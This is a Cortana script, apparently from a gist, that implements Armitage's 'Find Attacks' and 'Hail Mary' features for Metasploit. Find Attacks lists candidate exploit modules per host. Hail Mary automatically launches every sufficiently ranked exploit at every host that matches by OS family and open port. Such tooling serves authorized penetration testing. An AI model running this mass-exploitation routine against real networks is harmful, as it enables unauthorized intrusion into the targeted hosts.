Created
September 26, 2013 17:02
Cortana Find Attacks / Hail Mary Samples (taken out of context, not tested in production, used for testing in a stripped down Armitage)
#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#
# Build a lookup of exploit module name => default RPORT.
#
# Walks every module returned by modules("exploits"), fetches its option
# table with options("exploit", ...), and records the 'default' value of
# the RPORT option. Modules that declare no RPORT option are left out of
# the result, so callers get $null when they look such a module up.
#
# Returns: a hash keyed by module name.
sub exploitPorts {
    local('$name $opts %portOf');

    foreach $name (modules("exploits")) {
        $opts = options("exploit", $name);

        # nothing to record for a module without an RPORT option
        if ('RPORT' !in $opts) {
            continue;
        }

        %portOf[$name] = $opts['RPORT']['default'];
    }

    return %portOf;
}
# Translate a module rank name into a number so ranks can be compared.
#
# $1 - rank name: 'excellent', 'great', 'good', 'normal' or 'poor'
#
# Returns 5 (excellent) down to 1 (poor). Any other name has no entry in
# the table, so the lookup yields $null for it.
sub score {
    local('%rankValue');

    %rankValue = %(excellent => 5, great => 4, good => 3, normal => 2, poor => 1);

    return %rankValue[$1];
}
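# Ask the console for the exploit list and publish it as structured data.
#
# Registers a console_show handler and then issues "show exploits"
# asynchronously. The handler splits the text in $3 into lines and, for
# every line shaped like "<name> <yyyy-mm-dd> <rank> ...", records a
# %(date, rank, name) entry. Modules ranked "manual" are skipped. The
# collected array is fired as the "exploit_information" event, after
# which the script calls quit().
#
# Despite the name, nothing is sorted here; ordering is left to whoever
# handles "exploit_information".
sub sortedExploits {
    on console_show {
        local('$line $module $date $rank @r');

        foreach $line (split("\n", $3)) {
            if ($line ismatch '\s+(.*?)\s+(\d{4}-\d{2}-\d{2})\s+(\w+)\s+.*') {
                ($module, $date, $rank) = matched();

                if ($rank ne "manual") {
                    # The pattern captures a four-digit year first, so the
                    # parse format has to be year-month-day as well; a
                    # month-day-year format would misread the fields and
                    # give date values that do not order chronologically.
                    push(@r, %(date => parseDate("yyyy-MM-dd", $date), rank => score($rank), name => $module));
                }
            }
        }

        fire_event_async("exploit_information", @r);
        quit();
    }

    cmd_async("show exploits");
}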
# Decide whether a module's platform prefix fits a host's operating system.
#
# $1 - module name (e.g. "windows/...", "linux/...", "unix/...", "multi/...")
# $2 - host, passed to host_os()
#
# "multi/" modules match every host without looking at the OS. Otherwise
# "windows/" modules match a host reported as "Microsoft Windows", and both
# "linux/" and "unix/" modules match a host reported as "Linux". This is a
# coarse string comparison only; it says nothing about versions or patches.
#
# Returns 1 on a match, $null otherwise.
sub isHostMatch {
    local('$os');

    # platform-independent modules need no OS lookup
    if ([$1 startsWith: "multi/"]) {
        return 1;
    }

    $os = host_os($2);

    if ($os eq "Microsoft Windows" && [$1 startsWith: "windows/"]) {
        return 1;
    }

    if ($os eq "Linux" && ([$1 startsWith: "linux/"] || [$1 startsWith: "unix/"])) {
        return 1;
    }

    return $null;
}
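# Attacks -> Hail Mary: launch every qualifying exploit module at every
# matching host and log each launch in a "Hail Mary" text tab.
#
# Flow:
#   1. exploitPorts runs in a fork to collect module => default RPORT.
#   2. sortedExploits is spawned; its result arrives as the
#      "exploit_information" event, with the module list in $1.
#   3. The handler keeps modules whose rank is at least the
#      "armitage.required_exploit_rank.string" preference (default
#      "great"), orders them by rank and then by date, both descending,
#      and launches each one at every host for which isHostMatch() is true
#      and the host has a service on the module's default RPORT.
#
# Selection uses only rank, OS family and default port. Nothing here
# checks that a host is actually vulnerable, so a run is broad: many
# different modules are likely to be sent at the same hosts and ports in
# a short period.
#
# Closing a tab (tab_close) ends the script via quit().
sub runHailMary {
    global('$console $fork');

    $console = open_text_tab("Hail Mary", $null, "all");

    # let this happen in a separate thread...
    $fork = fork(&exploitPorts);

    on tab_close {
        quit();
    }

    on exploit_information {
        # $exploit and %ports are declared here so they stay local to the
        # handler instead of becoming script-wide globals
        local('$exploits $exploit %ports $port $host $total $minrank');

        # start at zero so the summary line shows a number even when no
        # module/host pair qualified
        $total = 0;

        # retrieve our exploit info... from our earlier thread.
        %ports = wait($fork);

        # drop modules that fall below the configured rank
        $minrank = score(pref_get("armitage.required_exploit_rank.string", "great"));
        $exploits = filter(lambda({
            return iff ($1['rank'] >= $minrank, $1);
        }, \$minrank), $1);

        # order by rank, highest first; equal ranks by date, highest first
        $exploits = map({ return $1['name']; }, sort({
            if ($2['rank'] == $1['rank']) {
                return $2['date'] <=> $1['date'];
            }
            else {
                return $2['rank'] <=> $1['rank'];
            }
        }, $exploits));

        # go through our exploits... best ones first
        foreach $exploit ($exploits) {
            $port = %ports[$exploit];

            foreach $host (hosts()) {
                if (isHostMatch($exploit, $host) && $host hasservice $port) {
                    exploit($exploit, $host);
                    append($console, "\cC[*]\o $[20]host => $exploit $+ \n");
                    $total++;
                }
            }
        }

        append($console, "\cC[*]\o Launched $total exploits...\n");
    }

    # let's rock...
    append($console, "\cC[*]\o Analyzing modules...\n");
    spawn(&sortedExploits);
}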
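# Attacks -> Find Attacks: work out which exploit modules are candidates
# for each host and publish the result; nothing is launched here.
#
# Flow:
#   1. exploitPorts runs in a fork to collect module => default RPORT.
#   2. sortedExploits is spawned; its result arrives as the
#      "exploit_information" event, with the module list in $1.
#   3. The handler keeps modules whose rank is at least the
#      "armitage.required_exploit_rank.string" preference (default
#      "great"). For every host where isHostMatch() is true and the host
#      has a service on the module's default RPORT, the module is filed
#      under %menus[host][service], where "service" is the second
#      path component of the module name.
#   4. %menus is fired as "attack_analysis_complete" and the script
#      calls quit().
#
# A listed module is only a candidate: the match is by rank, OS family
# and default port, not by any check of the host itself.
sub runFindAttacks {
    global('$fork');

    # let this happen in a separate thread...
    $fork = fork(&exploitPorts);

    on exploit_information {
        # every name the handler assigns is declared here so none of them
        # leaks out as a script-wide global
        local('$exploits $exploit %ports $port $host $srvc $module %menus $minrank');

        # retrieve our exploit info... from our earlier thread.
        %ports = wait($fork);

        # filter exploits that fall below our threshold
        $minrank = score(pref_get("armitage.required_exploit_rank.string", "great"));
        $exploits = map({ return $1['name']; }, filter(lambda({
            return iff ($1['rank'] >= $minrank, $1);
        }, \$minrank), $1));

        # go through the remaining exploits in the order they arrived;
        # no sorting is applied in this handler
        foreach $exploit ($exploits) {
            $port = %ports[$exploit];

            foreach $host (hosts()) {
                if (isHostMatch($exploit, $host) && $host hasservice $port) {
                    # first component is discarded, second is the menu group
                    ($null, $srvc, $module) = split('\\/', $exploit);

                    if ($host !in %menus) {
                        %menus[$host] = %();
                    }

                    if ($srvc !in %menus[$host]) {
                        %menus[$host][$srvc] = @();
                    }

                    push(%menus[$host][$srvc], $exploit);
                }
            }
        }

        fire_event_async("attack_analysis_complete", %menus);
        quit();
    }

    spawn(&sortedExploits);
}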